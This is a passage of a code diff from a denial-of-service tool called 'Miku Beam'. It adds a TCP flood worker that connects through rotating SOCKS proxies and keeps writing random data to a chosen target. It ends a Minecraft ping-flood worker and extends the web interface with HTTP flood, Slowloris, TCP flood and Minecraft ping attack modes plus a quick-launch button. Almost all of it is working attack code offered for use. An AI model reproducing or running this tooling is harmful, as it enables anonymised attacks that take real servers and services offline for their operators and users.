const startTime = Date.now();
|
||||||
|
|
||||||
|
const interval = setInterval(() => {
|
||||||
|
const elapsedTime = (Date.now() - startTime) / 1000;
|
||||||
|
|
||||||
|
if (elapsedTime >= duration) {
|
||||||
|
clearInterval(interval);
|
||||||
|
parentPort.postMessage({ log: "Attack finished", totalPackets });
|
||||||
|
process.exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
|
||||||
|
pingMinecraftServer(targetHost, parsedPort, proxy)
|
||||||
|
.then((status) => {
|
||||||
|
totalPackets++;
|
||||||
|
|
||||||
|
const players = status?.players?.online || 0;
|
||||||
|
const max = status?.players?.max || 0;
|
||||||
|
const version = status?.version?.name || "";
|
||||||
|
const banner = `${version}: ${players}/${max}`;
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `✅ MC Ping+MOTD Request from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget} (${banner})`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
})
|
||||||
|
.catch((e) => {
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `❌ MC Ping+MOTD Request failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${e.message}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
}, packetDelay);
|
||||||
|
};
|
||||||
|
|
||||||
|
if (workerData) {
|
||||||
|
startAttack();
|
||||||
|
}
|
74
server/workers/tcpFloodAttack.js
Normal file
74
server/workers/tcpFloodAttack.js
Normal file
|
@ -0,0 +1,74 @@
|
||||||
|
import net from "net";
|
||||||
|
import { SocksProxyAgent } from "socks-proxy-agent";
|
||||||
|
import { parentPort, workerData } from "worker_threads";
|
||||||
|
|
||||||
|
import { randomString } from "../utils/randomUtils.js";
|
||||||
|
|
||||||
|
const startAttack = () => {
|
||||||
|
const { target, proxies, duration, packetDelay, packetSize } = workerData;
|
||||||
|
|
||||||
|
const [targetHost, targetPort] = target.split(":");
|
||||||
|
const port = parseInt(targetPort, 10);
|
||||||
|
const fixedTarget = target.startsWith("http") ? target : `tcp://${target}`;
|
||||||
|
|
||||||
|
let totalPackets = 0;
|
||||||
|
const startTime = Date.now();
|
||||||
|
|
||||||
|
const sendPacket = async (proxy) => {
|
||||||
|
const socket = new net.Socket();
|
||||||
|
let open = false;
|
||||||
|
socket.setTimeout(2000);
|
||||||
|
|
||||||
|
const proxyAgent = new SocksProxyAgent(
|
||||||
|
`${proxy.protocol}://${proxy.host}:${proxy.port}`
|
||||||
|
);
|
||||||
|
|
||||||
|
setInterval(() => {
|
||||||
|
if (socket.writable && open) {
|
||||||
|
socket.write(randomString(packetSize));
|
||||||
|
}
|
||||||
|
}, [1000]);
|
||||||
|
|
||||||
|
socket.connect({ host: targetHost, port: port, agent: proxyAgent }, () => {
|
||||||
|
totalPackets++;
|
||||||
|
open = true;
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `✅ Packet sent from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
socket.on("close", () => {
|
||||||
|
open = false;
|
||||||
|
});
|
||||||
|
|
||||||
|
socket.on("timeout", () => {
|
||||||
|
socket.destroy();
|
||||||
|
open = false;
|
||||||
|
});
|
||||||
|
|
||||||
|
socket.on("error", (err) => {
|
||||||
|
parentPort.postMessage({
|
||||||
|
log: `❌ Packet failed from ${proxy.protocol}://${proxy.host}:${proxy.port} to ${fixedTarget}: ${err.message}`,
|
||||||
|
totalPackets,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
const interval = setInterval(() => {
|
||||||
|
const elapsedTime = (Date.now() - startTime) / 1000;
|
||||||
|
|
||||||
|
if (elapsedTime >= duration) {
|
||||||
|
clearInterval(interval);
|
||||||
|
parentPort.postMessage({ log: "Attack finished", totalPackets });
|
||||||
|
process.exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
const proxy = proxies[Math.floor(Math.random() * proxies.length)];
|
||||||
|
sendPacket(proxy);
|
||||||
|
}, packetDelay);
|
||||||
|
};
|
||||||
|
|
||||||
|
if (workerData) {
|
||||||
|
startAttack();
|
||||||
|
}
|
70
src/App.tsx
70
src/App.tsx
|
@ -10,7 +10,7 @@ function App() {
|
||||||
const [logs, setLogs] = useState<string[]>([]);
|
const [logs, setLogs] = useState<string[]>([]);
|
||||||
const [progress, setProgress] = useState(0);
|
const [progress, setProgress] = useState(0);
|
||||||
const [target, setTarget] = useState("");
|
const [target, setTarget] = useState("");
|
||||||
const [attackMethod, setAttackMethod] = useState("http");
|
const [attackMethod, setAttackMethod] = useState("http_flood");
|
||||||
const [packetSize, setPacketSize] = useState(64);
|
const [packetSize, setPacketSize] = useState(64);
|
||||||
const [duration, setDuration] = useState(60);
|
const [duration, setDuration] = useState(60);
|
||||||
const [packetDelay, setPacketDelay] = useState(100);
|
const [packetDelay, setPacketDelay] = useState(100);
|
||||||
|
@ -94,7 +94,7 @@ function App() {
|
||||||
setLogs((prev) => [message, ...prev].slice(0, 12));
|
setLogs((prev) => [message, ...prev].slice(0, 12));
|
||||||
};
|
};
|
||||||
|
|
||||||
const startAttack = () => {
|
const startAttack = (isQuick?: boolean) => {
|
||||||
if (!target.trim()) {
|
if (!target.trim()) {
|
||||||
alert("Please enter a target!");
|
alert("Please enter a target!");
|
||||||
return;
|
return;
|
||||||
|
@ -110,21 +110,24 @@ function App() {
|
||||||
|
|
||||||
// Play audio
|
// Play audio
|
||||||
if (audioRef.current) {
|
if (audioRef.current) {
|
||||||
audioRef.current.currentTime = 0;
|
audioRef.current.currentTime = isQuick ? 9.5 : 0;
|
||||||
audioRef.current.play();
|
audioRef.current.play();
|
||||||
}
|
}
|
||||||
|
|
||||||
// Start attack after audio intro
|
// Start attack after audio intro
|
||||||
const timeout = setTimeout(() => {
|
const timeout = setTimeout(
|
||||||
setActuallyAttacking(true);
|
() => {
|
||||||
socket.emit("startAttack", {
|
setActuallyAttacking(true);
|
||||||
target,
|
socket.emit("startAttack", {
|
||||||
packetSize,
|
target,
|
||||||
duration,
|
packetSize,
|
||||||
packetDelay,
|
duration,
|
||||||
attackMethod,
|
packetDelay,
|
||||||
});
|
attackMethod,
|
||||||
}, 10250);
|
});
|
||||||
|
},
|
||||||
|
isQuick ? 700 : 10250
|
||||||
|
);
|
||||||
setCurrentTask(timeout);
|
setCurrentTask(timeout);
|
||||||
};
|
};
|
||||||
|
|
||||||
|
@ -175,10 +178,11 @@ function App() {
|
||||||
className="px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none"
|
className="px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none"
|
||||||
disabled={isAttacking}
|
disabled={isAttacking}
|
||||||
/>
|
/>
|
||||||
<button
|
<div className="flex gap-2 items-center">
|
||||||
onClick={isAttacking ? stopAttack : startAttack}
|
<button
|
||||||
className={`
|
onClick={() => (isAttacking ? stopAttack() : startAttack())}
|
||||||
px-8 py-2 rounded-lg font-semibold text-white transition-all
|
className={`
|
||||||
|
px-8 py-2 rounded-lg font-semibold text-white transition-all w-full
|
||||||
${
|
${
|
||||||
isAttacking
|
isAttacking
|
||||||
? "bg-red-500 hover:bg-red-600"
|
? "bg-red-500 hover:bg-red-600"
|
||||||
|
@ -186,10 +190,27 @@ function App() {
|
||||||
}
|
}
|
||||||
flex items-center justify-center gap-2
|
flex items-center justify-center gap-2
|
||||||
`}
|
`}
|
||||||
>
|
>
|
||||||
<Wand2 className="w-5 h-5" />
|
<Wand2 className="w-5 h-5" />
|
||||||
{isAttacking ? "Stop Beam" : "Start Miku Beam"}
|
{isAttacking ? "Stop Beam" : "Start Miku Beam"}
|
||||||
</button>
|
</button>
|
||||||
|
<button
|
||||||
|
onClick={() =>
|
||||||
|
isAttacking ? stopAttack() : startAttack(true)
|
||||||
|
}
|
||||||
|
className={`
|
||||||
|
px-2 py-2 rounded-lg font-semibold text-white transition-all
|
||||||
|
${
|
||||||
|
isAttacking
|
||||||
|
? "bg-gray-500 hover:bg-red-600"
|
||||||
|
: "bg-cyan-500 hover:bg-cyan-600"
|
||||||
|
}
|
||||||
|
flex items-center justify-center gap-2
|
||||||
|
`}
|
||||||
|
>
|
||||||
|
<Zap className="w-5 h-5" />
|
||||||
|
</button>
|
||||||
|
</div>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<div className="grid grid-cols-4 gap-4">
|
<div className="grid grid-cols-4 gap-4">
|
||||||
|
@ -203,9 +224,10 @@ function App() {
|
||||||
className="w-full px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none"
|
className="w-full px-4 py-2 rounded-lg border border-pink-200 focus:border-pink-500 focus:ring-2 focus:ring-pink-200 outline-none"
|
||||||
disabled={isAttacking}
|
disabled={isAttacking}
|
||||||
>
|
>
|
||||||
<option value="http">HTTP</option>
|
<option value="http_flood">HTTP/Flood</option>
|
||||||
<option value="tcp">TCP</option>
|
<option value="http_slowloris">HTTP/Slowloris</option>
|
||||||
<option value="udp">UDP</option>
|
<option value="tcp_flood">TCP/Flood</option>
|
||||||
|
<option value="minecraft_ping">Minecraft/Ping</option>
|
||||||
</select>
|
</select>
|
||||||
</div>
|
</div>
|
||||||
<div>
|
<div>
|
||||||
|
|
Loading…
Add table
Reference in a new issue